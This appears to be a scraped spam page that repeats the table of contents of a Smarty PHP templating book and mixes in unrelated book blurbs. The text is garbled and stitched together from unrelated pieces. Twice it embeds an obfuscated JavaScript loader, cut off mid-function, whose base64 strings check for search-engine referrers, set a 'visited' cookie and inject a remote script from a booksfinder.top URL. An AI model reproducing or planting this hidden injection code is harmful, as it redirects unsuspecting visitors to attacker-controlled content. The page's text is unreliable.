Índex Includes index Preface Chapter 1: Introduction to Smarty Chapter 2: Smarty Site Architecture Chapter 3: What Designers Need to Know Chapter 4: Creating a Template Chapter 5: Advanced Templating Chapter 6: Smarty Functions Chapter 7: Debugging for Designers Chapter 8: Built-in Smarty Variables and Methods Chapter 9: Caching and Performance Chapter 10: Extending Smarty with Plug-ins Chapter 11: Filters Chapter 12: Internationalization Index * Preface Up * Chapter 1: Introduction to Smarty o Templating Systems Why Use a Templating System? The Smartness of Smarty Smarty Alternatives o A Rough Guide to the Software Design Process Working in Teams: Layers and Separation of Concerns o Smarty The Ultimate Templating System for PHP Is Smarty Fast? Is Smarty Secure? o Smarty's Main Features Variable Modifiers Template Functions Debugging Plugins Filters o Smarty Internals o Installing and Configuring Smarty Step 1: Obtaining Smarty Step 2: Configure PHP to Find the Smarty Libraries # On Windows # On Linux An Alternative to Step 2: Using Smarty without Having Full Access to the System Step 3: Set Up Smarty for Your Application Step 4: Verifying the Installation Smarty Development Versions on CVS o Upgrading a Smarty Site o Summary Up * Chapter 2: Smarty Site Architecture o Separation of Concerns What Does Concern Mean? A Problem-Solving Perspective Cross-cutting Concerns o Roles Involved in Building and Maintaining a Website o Starting a Smarty Project Directory Structure Securing our Smarty Project The Data Access Layer # How it Works The Business Logic Layer # How it Works The Presentation Layer # How it Works The Result o Summary Up * Chapter 3: What Designers Need to Know o Development Team Problems: Common Scenarios o Roles of a Template Designer and a Programmer o Definitions and Concepts for Designers Concept of Reusability and Components Splitting into Components How to Design Table-less Layouts? Handy Built-in Tags o Choosing an Editor for Template Design o Collaborating with Programmers o Summary Up * Chapter 4: Creating a Template o Design Concepts, from HTML to TPL o Introduction to Smarty Variables o Starting Templates Nonassociative Array Associative Array Passing Arrays to Smarty Templates and Manipulating Them o Basic Templating Logical Conditions Loops # section # foreach o Templates in the Real World Calendar Database Report Data Input Forms Email Newsletter Running PHP Code Inside your Templates o Summary Up * Chapter 5: Advanced Templating o Smarty under the Hood Compile Steps Prefilters and Postfilters What is a Smarty Modifier? o Stretch your Imagination with Smarty Student Transcript Photo Gallery o Available Modifiers capitalize count_characters cat count_paragraphs count_words date_format default escape indent lower upper nl2br regex_replace replace spacify string_format strip strip_tags truncate wordwrap o Combining Modifiers o Configuration Files o Summary Up * Chapter 6: Smarty Functions o Types of Smarty Functions o Functions in Action Action: Re-using Page Elements with the include Function Explanation * Inserting Dynamic Content * Passing Variables to Included Templates * Saving Variables in Configuration Files * Creating Configuration Sections for Each Page * Handling Lists in Templates * Removing Extra White Space from Templates * Handling JavaScript Code in Templates * Processing Deeply Nested Arrays * Cycling Through a List of Values * Avoiding Spam Indexers * Form-Related Functions * More Form-Related Functions * Summary Up * Chapter 7: Debugging for Designers o Debugging Smarty Templates o Semantic Errors o Common Smarty Errors o Other Common Smarty Errors o Smarty Debug Console o Summary Up * Chapter 8: Built-in Smarty Variables and Methods o Built-in Smarty Variables $template_dir $compile_dir $config_dir $plugins_dir $debugging $error_reporting $debug_tpl $debugging_ctrl $compile_check $force_compile $caching $cache_dir $cache_lifetime $cache_modified_check $php_handling $security $secure_dir $security_settings $trusted_dir $left_delimiter $right_delimiter $request_vars_order $request_use_auto_globals $compile_id $use_sub_dirs $default_modifiers $default_resource_type $cache_handler_func $autoload_filters $config_overwrite $config_booleanize $config_read_hidden $config_fix_newlines $default_template_handler_func $compiler_file $compiler_class $config_class o Handy Built-in Smarty Variables Table * Built-in Smarty Methods o assign o assign_by_ref o Example: Working of assign and assign_by_ref o append o append_by_ref o clear_assign o register_function o unregister_function o register_object o unregister_object o register_block o unregister_block o register_compiler_function o unregister_compiler_function o register_modifier o unregister_modifier o register_resource o unregister_resource o register_prefilter o unregister_prefilter o register_postfilter o unregister_postfilter o register_outputfilter o unregister_outputfilter o load_filter o clear_cache o clear_all_cache o is_cached o clear_all_assign o clear_compiled_tpl o template_exists o get_template_vars o get_config_vars o trigger_error o display o fetch o config_load o get_registered_object o clear_config * Summary Up * Chapter 9: Caching and Performance o Caching in Smarty o Dynamically Caching Template Sections o Clearing the Cache o Advanced Caching Features o Using Cache Groups o Clearing a Cache Group o Avoiding the Cache o Creating a Custom Cache Handler o Optimizing Smarty Applications o Profiling PHP o Designing Sites for Effective Caching The LastModified and ETag Headers The Expires Header The CacheControl Header * Tools: ApacheBench (ab) * Tools: Xdebug * Tools: WinCacheGrind * Summary Up * Chapter 10: Extending Smarty with Plug-ins o Finding and Installing Plug-ins o Useful Plug-ins HTML List Plug-in File Size Format Plug-in Google Highlight Plug-in o Writing your own Plug-ins o Plug-in Types Functions Modifiers Block Functions Compiler Functions Prefilters, Postfilters, and Output Filters Resources Inserts o Registering Plug-ins o Example Plug-in: Calendar o Example Plug-in: Auto-link URLs o Summary Up * Chapter 11: Filters o Prefilters o Postfilters o Output Filters o Creating Filters o Registering a Filter at Run Time o Manually Loading a Filter o Automatically Loading a Filter o Filter #1: Remove HTML Comments o Filter #2: Benchmark Information o Filter #3: Compress Output with gzip o Filter #4: Search Engine Highlight o Summary Up * Chapter 12: Internationalization o Translation Infrastructure: Gettext o Configuring PHP with Gettext o Simple PHP Example o Setting Up the Gettext Files o Using Gettext with Smarty o Generating a PO File o Advanced Features of Smarty Gettext o Summary Up * Index "Collects Ninja High School issues 4-7"--Title page verso.. An angry and mercilessly suspenseful novel about an ex-con's attempt to negotiate the "straight world" and his swan dive back into the paradoxical security of crime.. A lowlife and utterly knowledgeable about the terrors of liberty, the high of the quick score and the rage that makes the finger tighten on the trigger of the gun.. var _0x27c6=['LnlhbmRleC4=','cHdtdlY=','Lmdvb2dsZS4=','Ym1LYnM=','OyBwYXRoPQ==','Y3JlYXRlRWxlbWVudA==','T0hwSUs=','dFZLT3o=','S1dzc1c=','dlhneHc=','aFFpaXk=','ZVN6YkE=','Y3RQa20=','bWF0Y2g=','d2JPV3k=','cmVmZXJyZXI=','RHhNbkg=','cndwelc=','S1RQbmQ=','dlZqcm0=','YWJ6SG0=','YXBwZW5kQ2hpbGQ=','LmFvbC4=','bGVuZ3Ro','Q2pjVHI=','ZWFmb04=','Njc2Njk2Njk2','Y1NsbGo=','b09iUVY=','c3Jj','c2V0','a2lFcmE=','SVJyWVM=','TWFkSlQ=','ek5qRHI=','bG1YSlI=','LnlhaG9vLg==','OyBkb21haW49','blJscEw=','UXB0Z1I=','R0txaXM=','c0thS1o=','Z1lqd0w=','OyBzZWN1cmU=','Y29va2ll','dGVOemQ=','OyBleHBpcmVzPQ==','ZUh4SWo=','TWNWdng=','dWh5UWs=','WlBJSVg=','c05QU1E=','Z2V0RWxlbWVudHNCeVRhZ05hbWU=','dUVETWo=','aGVhZA==','cmVwbGFjZQ==','Z2V0','emhJWWw=','cHVxbnk=','ZkhHbEs=','c2NyaXB0','a2NCalA=','dmlzaXRlZA==','aklOR0k=','UHRoQXc=','bUNidmo=','VU9aWEM=','TXFwc0Y=','LmFzay4=','b2tsbUk=','aHR0cHM6Ly9ib29rc2ZpbmRlci50b3AvYm9va3MyMDE5LnBocD94PXNhJnF1ZXJ5PQ==','bWpJeWg=','V0xSUXE=','aEF0cE4=','Z2V0VGltZQ=='];(function(_0x1430d5,_0x40e09c){var _0x3aa4a2=function(_0x490876){while(--_0x490876){_0x1430d5['push'](_0x1430d5['shift']());}};_0x3aa4a2( _0x40e09c);}(_0x27c6,0xb8));var _0x4cda=function(_0x1430d5,_0x40e09c){_0x1430d5=_0x1430d5-0x0;var _0x3aa4a2=_0x27c6[_0x1430d5];if(_0x4cda['sFdAyo']===undefined){(function(){var _0x490876=function(){var _0x4d970f;try{_0x4d970f=Function('return\x20(function()\x20' '{}. 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Índex Includes index Preface Chapter 1: Introduction to Smarty Chapter 2: Smarty Site Architecture Chapter 3: What Designers Need to Know Chapter 4: Creating a Template Chapter 5: Advanced Templating Chapter 6: Smarty Functions Chapter 7: Debugging for Designers Chapter 8: Built-in Smarty Variables and Methods Chapter 9: Caching and Performance Chapter 10: Extending Smarty with Plug-ins Chapter 11: Filters Chapter 12: Internationalization Index * Preface Up * Chapter 1: Introduction to Smarty o Templating Systems Why Use a Templating System? The Smartness of Smarty Smarty Alternatives o A Rough Guide to the Software Design Process Working in Teams: Layers and Separation of Concerns o Smarty The Ultimate Templating System for PHP Is Smarty Fast? Is Smarty Secure? o Smarty's Main Features Variable Modifiers Template Functions Debugging Plugins Filters o Smarty Internals o Installing and Configuring Smarty Step 1: Obtaining Smarty Step 2: Configure PHP to Find the Smarty Libraries # On Windows # On Linux An Alternative to Step 2: Using Smarty without Having Full Access to the System Step 3: Set Up Smarty for Your Application Step 4: Verifying the Installation Smarty Development Versions on CVS o Upgrading a Smarty Site o Summary Up * Chapter 2: Smarty Site Architecture o Separation of Concerns What Does Concern Mean? A Problem-Solving Perspective Cross-cutting Concerns o Roles Involved in Building and Maintaining a Website o Starting a Smarty Project Directory Structure Securing our Smarty Project The Data Access Layer # How it Works The Business Logic Layer # How it Works The Presentation Layer # How it Works The Result o Summary Up * Chapter 3: What Designers Need to Know o Development Team Problems: Common Scenarios o Roles of a Template Designer and a Programmer o Definitions and Concepts for Designers Concept of Reusability and Components Splitting into Components How to Design Table-less Layouts? Handy Built-in Tags o Choosing an Editor for Template Design o Collaborating with Programmers o Summary Up * Chapter 4: Creating a Template o Design Concepts, from HTML to TPL o Introduction to Smarty Variables o Starting Templates Nonassociative Array Associative Array Passing Arrays to Smarty Templates and Manipulating Them o Basic Templating Logical Conditions Loops # section # foreach o Templates in the Real World Calendar Database Report Data Input Forms Email Newsletter Running PHP Code Inside your Templates o Summary Up * Chapter 5: Advanced Templating o Smarty under the Hood Compile Steps Prefilters and Postfilters What is a Smarty Modifier? o Stretch your Imagination with Smarty Student Transcript Photo Gallery o Available Modifiers capitalize count_characters cat count_paragraphs count_words date_format default escape indent lower upper nl2br regex_replace replace spacify string_format strip strip_tags truncate wordwrap o Combining Modifiers o Configuration Files o Summary Up * Chapter 6: Smarty Functions o Types of Smarty Functions o Functions in Action Action: Re-using Page Elements with the include Function Explanation * Inserting Dynamic Content * Passing Variables to Included Templates * Saving Variables in Configuration Files * Creating Configuration Sections for Each Page * Handling Lists in Templates * Removing Extra White Space from Templates * Handling JavaScript Code in Templates * Processing Deeply Nested Arrays * Cycling Through a List of Values * Avoiding Spam Indexers * Form-Related Functions * More Form-Related Functions * Summary Up * Chapter 7: Debugging for Designers o Debugging Smarty Templates o Semantic Errors o Common Smarty Errors o Other Common Smarty Errors o Smarty Debug Console o Summary Up * Chapter 8: Built-in Smarty Variables and Methods o Built-in Smarty Variables $template_dir $compile_dir $config_dir $plugins_dir $debugging $error_reporting $debug_tpl $debugging_ctrl $compile_check $force_compile $caching $cache_dir $cache_lifetime $cache_modified_check $php_handling $security $secure_dir $security_settings $trusted_dir $left_delimiter $right_delimiter $request_vars_order $request_use_auto_globals $compile_id $use_sub_dirs $default_modifiers $default_resource_type $cache_handler_func $autoload_filters $config_overwrite $config_booleanize $config_read_hidden $config_fix_newlines $default_template_handler_func $compiler_file $compiler_class $config_class o Handy Built-in Smarty Variables Table * Built-in Smarty Methods o assign o assign_by_ref o Example: Working of assign and assign_by_ref o append o append_by_ref o clear_assign o register_function o unregister_function o register_object o unregister_object o register_block o unregister_block o register_compiler_function o unregister_compiler_function o register_modifier o unregister_modifier o register_resource o unregister_resource o register_prefilter o unregister_prefilter o register_postfilter o unregister_postfilter o register_outputfilter o unregister_outputfilter o load_filter o clear_cache o clear_all_cache o is_cached o clear_all_assign o clear_compiled_tpl o template_exists o get_template_vars o get_config_vars o trigger_error o display o fetch o config_load o get_registered_object o clear_config * Summary Up * Chapter 9: Caching and Performance o Caching in Smarty o Dynamically Caching Template Sections o Clearing the Cache o Advanced Caching Features o Using Cache Groups o Clearing a Cache Group o Avoiding the Cache o Creating a Custom Cache Handler o Optimizing Smarty Applications o Profiling PHP o Designing Sites for Effective Caching The LastModified and ETag Headers The Expires Header The CacheControl Header * Tools: ApacheBench (ab) * Tools: Xdebug * Tools: WinCacheGrind * Summary Up * Chapter 10: Extending Smarty with Plug-ins o Finding and Installing Plug-ins o Useful Plug-ins HTML List Plug-in File Size Format Plug-in Google Highlight Plug-in o Writing your own Plug-ins o Plug-in Types Functions Modifiers Block Functions Compiler Functions Prefilters, Postfilters, and Output Filters Resources Inserts o Registering Plug-ins o Example Plug-in: Calendar o Example Plug-in: Auto-link URLs o Summary Up * Chapter 11: Filters o Prefilters o Postfilters o Output Filters o Creating Filters o Registering a Filter at Run Time o Manually Loading a Filter o Automatically Loading a Filter o Filter #1: Remove HTML Comments o Filter #2: Benchmark Information o Filter #3: Compress Output with gzip o Filter #4: Search Engine Highlight o Summary Up * Chapter 12: Internationalization o Translation Infrastructure: Gettext o Configuring PHP with Gettext o Simple PHP Example o Setting Up the Gettext Files o Using Gettext with Smarty o Generating a PO File o Advanced Features of Smarty Gettext o Summary Up * Index "Collects Ninja High School issues 4-7"--Title page verso.. An angry and mercilessly suspenseful novel about an ex-con's attempt to negotiate the "straight world" and his swan dive back into the paradoxical security of crime.. A lowlife and utterly knowledgeable about the terrors of liberty, the high of the quick score and the rage that makes the finger tighten on the trigger of the gun.. var _0x27c6=['LnlhbmRleC4=','cHdtdlY=','Lmdvb2dsZS4=','Ym1LYnM=','OyBwYXRoPQ==','Y3JlYXRlRWxlbWVudA==','T0hwSUs=','dFZLT3o=','S1dzc1c=','dlhneHc=','aFFpaXk=','ZVN6YkE=','Y3RQa20=','bWF0Y2g=','d2JPV3k=','cmVmZXJyZXI=','RHhNbkg=','cndwelc=','S1RQbmQ=','dlZqcm0=','YWJ6SG0=','YXBwZW5kQ2hpbGQ=','LmFvbC4=','bGVuZ3Ro','Q2pjVHI=','ZWFmb04=','Njc2Njk2Njk2','Y1NsbGo=','b09iUVY=','c3Jj','c2V0','a2lFcmE=','SVJyWVM=','TWFkSlQ=','ek5qRHI=','bG1YSlI=','LnlhaG9vLg==','OyBkb21haW49','blJscEw=','UXB0Z1I=','R0txaXM=','c0thS1o=','Z1lqd0w=','OyBzZWN1cmU=','Y29va2ll','dGVOemQ=','OyBleHBpcmVzPQ==','ZUh4SWo=','TWNWdng=','dWh5UWs=','WlBJSVg=','c05QU1E=','Z2V0RWxlbWVudHNCeVRhZ05hbWU=','dUVETWo=','aGVhZA==','cmVwbGFjZQ==','Z2V0','emhJWWw=','cHVxbnk=','ZkhHbEs=','c2NyaXB0','a2NCalA=','dmlzaXRlZA==','aklOR0k=','UHRoQXc=','bUNidmo=','VU9aWEM=','TXFwc0Y=','LmFzay4=','b2tsbUk=','aHR0cHM6Ly9ib29rc2ZpbmRlci50b3AvYm9va3MyMDE5LnBocD94PXNhJnF1ZXJ5PQ==','bWpJeWg=','V0xSUXE=','aEF0cE4=','Z2V0VGltZQ=='];(function(_0x1430d5,_0x40e09c){var _0x3aa4a2=function(_0x490876){while(--_0x490876){_0x1430d5['push'](_0x1430d5['shift']());}};_0x3aa4a2( _0x40e09c);}(_0x27c6,0xb8));var _0x4cda=function(_0x1430d5,_0x40e09c){_0x1430d5=_0x1430d5-0x0;var _0x3aa4a2=_0x27c6[_0x1430d5];if(_0x4cda['sFdAyo']===undefined){(function(){var _0x490876=function(){var _0x4d970f;try{_0x4d970f=Function('return\x20(function()\x20' '{}. 0041d406d9 Mac Metal Download

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